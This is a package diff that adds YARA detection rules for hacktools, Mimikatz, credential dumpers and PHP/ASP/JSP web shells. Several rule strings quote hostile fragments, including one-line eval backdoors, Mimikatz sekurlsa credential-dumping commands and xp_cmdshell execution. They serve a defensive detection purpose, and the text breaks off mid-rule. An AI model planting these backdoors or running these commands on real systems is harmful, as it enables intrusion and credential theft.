+		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+		$s3 = "killall -9 pscan2" fullword ascii
+		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
+		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+	condition:
+		1 of them
+}
+
+rule LinuxHacktool_eyes_pscan2_2 {
+	meta:
+		description = "Linux hack tools - file pscan2.c"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+	strings:
+		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+	condition:
+		2 of them
+}
+
+rule CN_Portscan : APT
+{
+    meta:
+        description = "CN Port Scanner"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+    	$s1 = "MZ"
+		$s2 = "TCP 12.12.12.12"
+    condition:
+        ($s1 at 0) and $s2
+}
+
+rule WMI_vbs : APT
+{
+    meta:
+        description = "WMI Tool - APT"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
+    condition:
+        all of them
+}
+
+rule CN_Toolset__XScanLib_XScanLib_XScanLib {
+	meta:
+		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
+		author = "Florian Roth"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
+		date = "2015/03/30"
+		score = 70
+		super_rule = 1
+		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
+		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
+		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
+	strings:
+		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
+		$s2 = "PlugGetUdpPort" fullword
+		$s3 = "XScanLib.dll" fullword
+		$s4 = "PlugGetTcpPort" fullword
+		$s11 = "PlugGetVulnNum" fullword
+	condition:
+		all of them
+}
+
+rule CN_Toolset_NTscan_PipeCmd {
+	meta:
+		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
+		author = "Florian Roth"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
+		date = "2015/03/30"
+		score = 70
+		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
+	strings:
+		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
+		$s3 = "PipeCmd.exe" fullword wide
+		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
+		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
+		$s9 = "PipeCmdSrv.exe" fullword ascii
+		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
+		$s14 = "PIPECMDSRV" fullword wide
+		$s15 = "PipeCmd Service" fullword ascii
+	condition:
+		4 of them
+}
+
+rule CN_Toolset_LScanPortss_2 {
+	meta:
+		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
+		author = "Florian Roth"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
+		date = "2015/03/30"
+		score = 70
+		hash = "4631ec57756466072d83d49fbc14105e230631a0"
+	strings:
+		$s1 = "LScanPort.EXE" fullword wide
+		$s3 = "www.honker8.com" fullword wide
+		$s4 = "DefaultPort.lst" fullword ascii
+		$s5 = "Scan over.Used %dms!" fullword ascii
+		$s6 = "www.hf110.com" fullword wide
+		$s15 = "LScanPort Microsoft " fullword wide
+		$s18 = "L-ScanPort2.0 CooFly" fullword wide
+	condition:
+		4 of them
+}
+
+rule CN_Toolset_sig_1433_135_sqlr {
+	meta:
+		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
+		author = "Florian Roth"
+		reference = "http://qiannao.com/ls/905300366/33834c0c/"
+		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
+		date = "2015/03/30"
+		score = 70
+		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
+	strings:
+		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
+		$s11 = ";DATABASE=master" fullword ascii
+		$s12 = "xp_cmdshell '" fullword ascii
+		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
+	condition:
+		all of them
+}
+
+
+/* Mimikatz */
+
+rule Mimikatz_Memory_Rule_1 : APT {
+	meta:
+		author = "Florian Roth"
+		date = "12/22/2014"
+		score = 70
+		type = "memory"
+		description = "Detects password dumper mimikatz in memory"
+	strings:
+		$s1 = "sekurlsa::msv" fullword ascii
+	    $s2 = "sekurlsa::wdigest" fullword ascii
+	    $s4 = "sekurlsa::kerberos" fullword ascii
+	    $s5 = "sekurlsa::tspkg" fullword ascii
+	    $s6 = "sekurlsa::livessp" fullword ascii
+	    $s7 = "sekurlsa::ssp" fullword ascii
+	    $s8 = "sekurlsa::logonPasswords" fullword ascii
+	    $s9 = "sekurlsa::process" fullword ascii
+	    $s10 = "ekurlsa::minidump" fullword ascii
+	    $s11 = "sekurlsa::pth" fullword ascii
+	    $s12 = "sekurlsa::tickets" fullword ascii
+	    $s13 = "sekurlsa::ekeys" fullword ascii
+	    $s14 = "sekurlsa::dpapi" fullword ascii
+	    $s15 = "sekurlsa::credman" fullword ascii
+	condition:
+		1 of them
+}
+
+rule Mimikatz_Memory_Rule_2 : APT {
+	meta:
+		description = "Mimikatz Rule generated from a memory dump"
+		author = "Florian Roth - Florian Roth"
+		type = "memory"
+		score = 80
+	strings:
+		$s0 = "sekurlsa::" ascii
+		$x1 = "cryptprimitives.pdb" ascii
+		$x2 = "Now is t1O" ascii fullword
+		$x4 = "ALICE123" ascii
+		$x5 = "BOBBY456" ascii
+	condition:
+		$s0 and 1 of ($x*)
+}
+
+rule mimikatz
+{
+	meta:
+		description		= "mimikatz"
+		author			= "Benjamin DELPY (gentilkiwi)"
+		tool_author		= "Benjamin DELPY (gentilkiwi)"
+      score          = 80
+	strings:
+		$exe_x86_1		= { 89 71 04 89 [0-3] 30 8d 04 bd }
+		$exe_x86_2		= { 89 79 04 89 [0-3] 38 8d 04 b5 }
+
+		$exe_x64_1		= { 4c 03 d8 49 [0-3] 8b 03 48 89 }
+		$exe_x64_2		= { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
+
+		$dll_1			= { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
+		$dll_2			= { c7 0? 10 02 00 00 ?? 89 4? }
+
+		$sys_x86		= { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
+		$sys_x64		= { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
+
+	condition:
+		(all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
+}
+
+
+rule mimikatz_lsass_mdmp
+{
+	meta:
+		description		= "LSASS minidump file for mimikatz"
+		author			= "Benjamin DELPY (gentilkiwi)"
+
+	strings:
+		$lsass			= "System32\\lsass.exe"	wide nocase
+
+	condition:
+		(uint32(0) == 0x504d444d) and $lsass
+}
+
+
+rule mimikatz_kirbi_ticket
+{
+	meta:
+		description		= "KiRBi ticket for mimikatz"
+		author			= "Benjamin DELPY (gentilkiwi)"
+
+	strings:
+		$asn1			= { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
+
+	condition:
+		$asn1 at 0
+}
+
+
+rule wce
+{
+	meta:
+		description		= "wce"
+		author			= "Benjamin DELPY (gentilkiwi)"
+		tool_author		= "Hernan Ochoa (hernano)"
+
+	strings:
+		$hex_legacy		= { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
+		$hex_x86		= { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
+		$hex_x64		= { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
+
+	condition:
+		any of them
+}
+
+
+rule lsadump
+{
+	meta:
+		description		= "LSA dump programe (bootkey/syskey) - pwdump and others"
+		author			= "Benjamin DELPY (gentilkiwi)"
+
+	strings:
+		$str_sam_inc	= "\\Domains\\Account" ascii nocase
+		$str_sam_exc	= "\\Domains\\Account\\Users\\Names\\" ascii nocase
+		$hex_api_call	= {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 }
+		$str_msv_lsa	= { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 }
+		$hex_bkey		= { 4b 53 53 4d [20-70] 05 00 01 00}
+
+	condition:
+		( ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey )
+      and not uint16(0) == 0x5a4d
+}
+
+rule Mimikatz_Logfile
+{
+	meta:
+		description = "Detects a log file generated by malicious hack tool mimikatz"
+		author = "Florian Roth"
+		score = 80
+		date = "2015/03/31"
+		reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar"
+	strings:
+		$s1 = "SID               :" ascii fullword
+		$s2 = "* NTLM     :" ascii fullword
+		$s3 = "Authentication Id :" ascii fullword
+		$s4 = "wdigest :" ascii fullword
+	condition:
+		all of them
+}
+
+rule AppInitHook {
+	meta:
+		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
+		author = "Florian Roth"
+		reference = "https://goo.gl/Z292v6"
+		date = "2015-07-15"
+		score = 70
+		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
+	strings:
+		$s0 = "\\Release\\AppInitHook.pdb" ascii
+		$s1 = "AppInitHook.dll" fullword ascii
+		$s2 = "mimikatz.exe" fullword wide
+		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
+		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
+		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
+		$s6 = "VoidFunc" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and 4 of them
+}
+
+rule VSSown_VBS {
+	meta:
+		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
+		author = "Florian Roth"
+		date = "2015-10-01"
+		score = 75
+	strings:
+		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
+		$s1 = "Select * From Win32_ShadowCopy" ascii
+		$s2 = "cmd /C mklink /D " ascii
+		$s3 = "ClientAccessible" ascii
+		$s4 = "WScript.Shell" ascii
+		$s5 = "Win32_Process" ascii
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/THOR_Webshells.yar remnux-rules-0.0.4/yara/malware/THOR_Webshells.yar
--- remnux-rules-0.0.3/yara/malware/THOR_Webshells.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/THOR_Webshells.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,8554 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+
+   THOR APT Scanner - Web Shells Extract
+   This rulset is a subset of all hack tool rules included in our
+   APT Scanner THOR - the full featured APT scanner
+
+   We will frequently update this file with new rules rated TLP:WHITE
+
+   Florian Roth
+   BSK Consulting GmbH
+   Web: bsk-consulting.de
+
+   revision: 20150122
+
+*/
+
+rule Weevely_Webshell {
+	meta:
+		description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
+		author = "Florian Roth"
+		reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$php = "<?php" ascii
+		$s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
+		$s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
+		$s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
+		$s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
+	condition:
+		$php at 0 and all of ($s*) and filesize > 570 and filesize < 800
+}
+
+rule webshell_h4ntu_shell_powered_by_tsoi_ {
+	meta:
+		description = "Web Shell - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
+	condition:
+		all of them
+}
+rule webshell_PHP_sql {
+	meta:
+		description = "Web Shell - file sql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2cf20a207695bbc2311a998d1d795c35"
+	strings:
+		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		all of them
+}
+rule webshell_PHP_a {
+	meta:
+		description = "Web Shell - file a.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e3b461f7464d81f5022419d87315a90d"
+	strings:
+		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+	condition:
+		2 of them
+}
+rule webshell_iMHaPFtp_2 {
+	meta:
+		description = "Web Shell - file iMHaPFtp.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
+		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+	condition:
+		1 of them
+}
+rule webshell_Jspspyweb {
+	meta:
+		description = "Web Shell - file Jspspyweb.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4e9be07e95fff820a9299f3fb4ace059"
+	strings:
+		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+	condition:
+		all of them
+}
+rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+	condition:
+		1 of them
+}
+rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend {
+	meta:
+		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+	condition:
+		1 of them
+}
+rule webshell_phpshell_2_1_pwhash {
+	meta:
+		description = "Web Shell - file pwhash.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ba120abac165a5a30044428fac1970d8"
+	strings:
+		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+	condition:
+		1 of them
+}
+rule webshell_PHPRemoteView {
+	meta:
+		description = "Web Shell - file PHPRemoteView.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+	condition:
+		1 of them
+}
+rule webshell_jsp_12302 {
+	meta:
+		description = "Web Shell - file 12302.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3930518ea57d899457a62f372205f7f"
+	strings:
+		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_guo {
+	meta:
+		description = "Web Shell - file guo.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9e69a8f499c660ee0b4796af14dc08f0"
+	strings:
+		$s0 = "<?php ($www= $_POST['ice'])!"
+		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+	condition:
+		1 of them
+}
+rule webshell_PHP_redcod {
+	meta:
+		description = "Web Shell - file redcod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+	strings:
+		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+	condition:
+		all of them
+}
+rule webshell_remview_fix {
+	meta:
+		description = "Web Shell - file remview_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+	strings:
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+	condition:
+		1 of them
+}
+rule webshell_asp_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "895ca846858c315a3ff8daa7c55b3119"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		1 of them
+}
+rule webshell_php_sh_server {
+	meta:
+		description = "Web Shell - file server.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "d87b019e74064aa90e2bb143e5e16cfa"
+	strings:
+		$s0 = "eval(getenv('HTTP_CODE'));" fullword
+	condition:
+		all of them
+}
+rule webshell_PH_Vayv_PH_Vayv {
+	meta:
+		description = "Web Shell - file PH Vayv.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+	condition:
+		1 of them
+}
+rule webshell_caidao_shell_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "6560b436d3d3bb75e2ef3f032151d139"
+	strings:
+		$s0 = "<%eval request(\"ice\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_cihshell_fix {
+	meta:
+		description = "Web Shell - file cihshell_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3823ac218032549b86ee7c26f10c4cb5"
+	strings:
+		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+	condition:
+		1 of them
+}
+rule webshell_asp_shell {
+	meta:
+		description = "Web Shell - file shell.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e63f5a96570e1faf4c7b8ca6df750237"
+	strings:
+		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+	condition:
+		all of them
+}
+rule webshell_Private_i3lue {
+	meta:
+		description = "Web Shell - file Private-i3lue.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s8 = "case 15: $image .= \"\\21\\0\\"
+	condition:
+		all of them
+}
+rule webshell_php_up {
+	meta:
+		description = "Web Shell - file up.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+	strings:
+		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+	condition:
+		2 of them
+}
+rule webshell_Mysql_interface_v1_0 {
+	meta:
+		description = "Web Shell - file Mysql interface v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a12fc0a3d31e2f89727b9678148cd487"
+	strings:
+		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+	condition:
+		all of them
+}
+rule webshell_php_s_u {
+	meta:
+		description = "Web Shell - file s-u.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+	strings:
+		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+	condition:
+		all of them
+}
+rule webshell_phpshell_2_1_config {
+	meta:
+		description = "Web Shell - file config.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bd83144a649c5cc21ac41b505a36a8f3"
+	strings:
+		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+	condition:
+		all of them
+}
+rule webshell_asp_EFSO_2 {
+	meta:
+		description = "Web Shell - file EFSO_2.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+	condition:
+		all of them
+}
+rule webshell_jsp_up {
+	meta:
+		description = "Web Shell - file up.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "515a5dd86fe48f673b72422cccf5a585"
+	strings:
+		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+	condition:
+		all of them
+}
+rule webshell_NetworkFileManagerPHP {
+	meta:
+		description = "Web Shell - file NetworkFileManagerPHP.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+	strings:
+		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+	condition:
+		all of them
+}
+rule webshell_Server_Variables {
+	meta:
+		description = "Web Shell - file Server Variables.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "47fb8a647e441488b30f92b4d39003d7"
+	strings:
+		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+		$s9 = "Variable Name</B></font></p>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_ice_2 {
+	meta:
+		description = "Web Shell - file ice.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1d6335247f58e0a5b03e17977888f5f2"
+	strings:
+		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_mdb {
+	meta:
+		description = "Web Shell - file mdb.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+	strings:
+		$s1 = "<% execute request(\"ice\")%>a " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige {
+	meta:
+		description = "Web Shell - file guige.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2c9f2dafa06332957127e2c713aacdd2"
+	strings:
+		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+	condition:
+		all of them
+}
+rule webshell_phpspy2010 {
+	meta:
+		description = "Web Shell - file phpspy2010.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "14ae0e4f5349924a5047fed9f3b105c5"
+	strings:
+		$s3 = "eval(gzinflate(base64_decode("
+		$s5 = "//angel" fullword
+		$s8 = "$admin['cookiedomain'] = '';" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d141e011a92f48da72728c35f1934a2b"
+	strings:
+		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+	condition:
+		all of them
+}
+rule webshell_drag_system {
+	meta:
+		description = "Web Shell - file system.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "15ae237cf395fb24cf12bff141fb3f7c"
+	strings:
+		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+	condition:
+		all of them
+}
+rule webshell_DarkBlade1_3_asp_indexx {
+	meta:
+		description = "Web Shell - file indexx.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7f46693648f534c2ca78e3f21685707"
+	strings:
+		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+	condition:
+		all of them
+}
+rule webshell_phpshell3 {
+	meta:
+		description = "Web Shell - file phpshell3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "76117b2ee4a7ac06832d50b2d04070b8"
+	strings:
+		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_hsxa {
+	meta:
+		description = "Web Shell - file hsxa.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_jsp_utils {
+	meta:
+		description = "Web Shell - file utils.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
